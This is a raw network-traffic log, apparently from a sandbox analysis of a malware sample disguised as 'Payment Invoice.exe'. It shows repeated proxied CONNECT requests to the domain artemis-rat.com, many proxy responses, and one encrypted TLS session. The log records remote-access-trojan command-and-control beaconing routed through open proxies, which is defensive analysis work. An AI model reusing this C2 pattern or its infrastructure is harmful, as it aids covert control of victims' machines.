                                                                913192.168.2.452727146.19.106.217123347076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.386339903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                914192.168.2.452724107.175.37.178430297076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.396212101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                915192.168.2.452647103.49.202.252807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.398679972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.780613899 CET343INHTTP/1.1 400 Bad Request
                                                                Server: nginx/1.14.0 (Ubuntu)
                                                                Date: Mon, 11 Mar 2024 15:15:18 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 182
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                916192.168.2.452653202.40.181.220312477076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.447515011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                917192.168.2.452772172.67.253.69807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.452029943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.608030081 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:18 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                918192.168.2.45269435.79.120.24231287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.452235937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.724328995 CET116INHTTP/1.1 200 OK
                                                                Date: Mon, 11 Mar 2024 15:15:18 GMT
                                                                Server: nginx
                                                                Content-Type: text/plain
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                919192.168.2.45079945.150.25.13280807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.452404976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.511470079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.511595011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:30.527074099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:42.620832920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:54.620507002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:06.714431047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:30.823693037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                920192.168.2.452660103.200.135.22941457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.453011036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                921192.168.2.45266145.11.95.16560107076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.453550100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                922192.168.2.452639175.183.82.22181937076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.454509974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                923192.168.2.452798104.19.171.188807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.454943895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.609437943 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:18 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                924192.168.2.451921142.54.229.24941457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.454943895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                925192.168.2.452688110.12.211.140807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.455282927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.756180048 CET340INHTTP/1.1 400 Bad Request
                                                                Server: nginx/1.12.2
                                                                Date: Mon, 11 Mar 2024 15:15:13 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Content-Length: 173
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                926192.168.2.452240148.72.209.17447347076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.456147909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.480124950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.589634895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:30.589534044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:42.589395046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:54.591994047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:06.589241982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:30.589241028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:17:18.670645952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                927192.168.2.452654123.126.158.50807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.456187010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.203677893 CET59INHTTP/1.1 200 Connection Established
                                                                Proxy-agent: nginx
                                                                Mar 11, 2024 16:15:19.210504055 CET369OUTData Raw: 16 03 03 01 6c 01 00 01 68 03 03 65 ef 20 05 b0 83 06 9b b5 13 87 a0 a1 1b 17 94 7d 57 a5 8c 8d 87 02 d0 72 1d 8d cd 11 6f 77 3d 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                Data Ascii: lhe }Wrow=*,+0/$#('=<5/artemis-rat.com#=J*=;kRR)L\40=o-Kz/1
                                                                Mar 11, 2024 16:15:19.929999113 CET1286INData Raw: 16 03 03 00 43 02 00 00 3f 03 03 65 ef 20 07 a7 cb e4 47 bc d4 4b ed ac 77 43 f4 cf 2d 03 97 60 11 84 02 44 4f 57 4e 47 52 44 01 00 c0 2f 00 00 17 00 00 00 00 00 17 00 00 ff 01 00 01 00 00 0b 00 02 01 00 00 23 00 00 16 03 03 10 6b 0b 00 10 67 00
                                                                Data Ascii: C?e GKwC-`DOWNGRD/#kgde0a0I?LR0*H0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P50240214225240Z240514225239Z010
                                                                Mar 11, 2024 16:15:19.930006027 CET1286INData Raw: 98 6e 71 f4 11 ac 4d b8 a7 7d 6f da c6 bc f4 b1 9e 56 4d 29 6b 80 18 2b 54 cc 2f af 96 ce 21 d1 4a a2 d6 af dc dc c3 23 73 8a f8 60 aa 82 11 8f 73 e6 dd de ff f1 c4 74 75 19 89 f2 11 f3 81 b3 5c 09 1f 05 21 66 f5 dc f5 01 c2 34 dc e1 8e 2b 77 c7
                                                                Data Ascii: nqM}oVM)k+T/!J#s`stu\!f4+wF3yO3RDw.QJRh8?hXZR`UHG3XF%~ t\5|0F<Arp'~00tP'S"0*H0G10UUS
                                                                Mar 11, 2024 16:15:19.930011988 CET324INData Raw: 9f 57 a9 41 6d 5a 90 a7 db 3a ea 75 80 0c 63 0b 69 74 6f 07 4c 15 f3 37 28 a5 19 a4 6e f5 f6 20 cd 63 b2 7e c4 2b 09 75 89 da d1 3c 2e 72 4f 36 1a a1 9e 44 d0 cd 9b a6 23 08 3f 97 a1 a7 9e 5a a5 f7 09 94 ad 5d 76 5d 28 56 d1 1a 66 51 51 07 7b de
                                                                Data Ascii: WAmZ:ucitoL7(n c~+u<.rO6D#?Z]v](VfQQ{=0z$-KO?*'>#ZB-z6=`9c*xN!>\9+S/tgw7-[peZ%wjNuMjfynm"m,P5}pY*
                                                                Mar 11, 2024 16:15:19.930107117 CET1286INData Raw: 05 66 30 82 05 62 30 82 04 4a a0 03 02 01 02 02 10 77 bd 0d 6c db 36 f9 1a ea 21 0f c4 f0 58 d3 0d 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 57 31 0b 30 09 06 03 55 04 06 13 02 42 45 31 19 30 17 06 03 55 04 0a 13 10 47 6c 6f 62 61 6c 53 69
                                                                Data Ascii: f0b0Jwl6!X0*H0W10UBE10UGlobalSign nv-sa10URoot CA10UGlobalSign Root CA0200619000042Z280128000042Z0G10UUS1"0 UGoogle Trust Services LLC10UGTS Root R10
                                                                Mar 11, 2024 16:15:20.341784000 CET412INData Raw: e3 3d f4 67 6d 3d 7c e5 34 88 e3 32 fa a7 6e 06 6a 6f bd 8b 91 ee 16 4b e8 3b a9 b3 37 e7 c3 44 a4 7e d8 6c d7 c7 46 f5 92 9b e7 d5 21 be 66 92 19 94 55 6c d4 29 b2 0d c1 66 5b e2 77 49 48 28 ed 9d d7 1a 33 72 53 b3 82 35 cf 62 8b c9 24 8b a5 b7
                                                                Data Ascii: =gm=|42njoK;7D~lF!fUl)f[wIH(3rS5b$9~*AR?,( Ik e)]Q)Uc-GU0}g<LJOL1h}\89)/.5XsTt|wj2-'e>o6[MIh>G8Sf0
                                                                Mar 11, 2024 16:15:20.495471001 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 46 8e 47 d1 70 55 19 43 7e b1 de 01 f4 b9 46 16 d3 6b 60 bc ea 6b 9d 20 49 ea 06 99 08 4e 6c 58 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 90 5e d7 1f fa d6 c1 e1 df c0 97 3b d7 99 be 89 8c 80 e5 3c 7e
                                                                Data Ascii: %! FGpUC~Fk`k INlX(^;<~;.]~
                                                                Mar 11, 2024 16:15:21.203012943 CET258INData Raw: 16 03 03 00 ca 04 00 00 c6 00 00 fd 1f 00 c0 78 f9 82 9d 63 35 f1 91 18 31 d0 9d 71 e8 36 7f ff 8d 26 b3 c1 e3 73 14 ef 31 a7 88 88 2c 31 ae 20 81 45 26 77 d0 6f 78 ed 1d 20 fa 55 89 2e 9e 5c 8c 92 51 d7 e0 6a a4 14 d6 53 3b 64 e1 d2 27 0f e7 f6
                                                                Data Ascii: xc51q6&s1,1 E&wox U.\QjS;d'Q91i5%/t;Q*erUvxcazLj|SPftN"JB*A?q7%Uq!,]bQ_0"'(@|?(t
                                                                Mar 11, 2024 16:15:21.205010891 CET252OUTData Raw: 17 03 03 00 f7 00 00 00 00 00 00 00 01 24 aa f1 ca 96 9b 30 0b 4d 58 50 63 94 aa 9c 5b c1 7b 19 18 4d 8e fc 75 6c a6 0d dd 48 7f d8 db af 8a dd 56 50 47 8d e3 e1 26 bf 03 84 d7 43 a5 d6 e7 f5 6a ee d7 c3 c6 98 40 c9 9f b1 3a 8b 39 a8 9f 60 8f 8b
                                                                Data Ascii: $0MXPc[{MulHVPG&Cj@:9`P-g1w kT&6$Y?C\U]e75x zla*DZ-NpjX$Q=98}cQ]bF[o5~[ @[
                                                                Mar 11, 2024 16:15:21.917146921 CET1286INData Raw: 17 03 03 05 71 00 00 00 00 00 00 00 01 95 ab 54 d6 c3 a7 5c e6 e1 89 0f 69 da 31 d4 5b 6b 16 36 e4 9a fd 67 ce f4 f3 7a 0e f6 7d 91 10 84 be 2d a5 c9 e4 29 2f 16 45 c5 b0 c1 3a 8d 74 3e 03 d3 34 27 1e ce 1c 85 b7 c6 8f aa 39 52 f3 bf 05 3c a5 14
                                                                Data Ascii: qT\i1[k6gz}-)/E:t>4'9R<q2DxI@3#tLdM\L!|OAM:d4MGIfQ&Y9v@zxj>"Qt=lwODcC$sHhvDr_zLnnFLyZ$LbH-$\BV


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                928192.168.2.452808104.16.25.216807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.456696987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.610985041 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:18 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                929192.168.2.450995159.223.166.21218987076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.456769943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                930192.168.2.45269551.15.211.81163797076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.456770897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.214351892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.383124113 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                Content-Type: text/html; charset=iso-8859-1
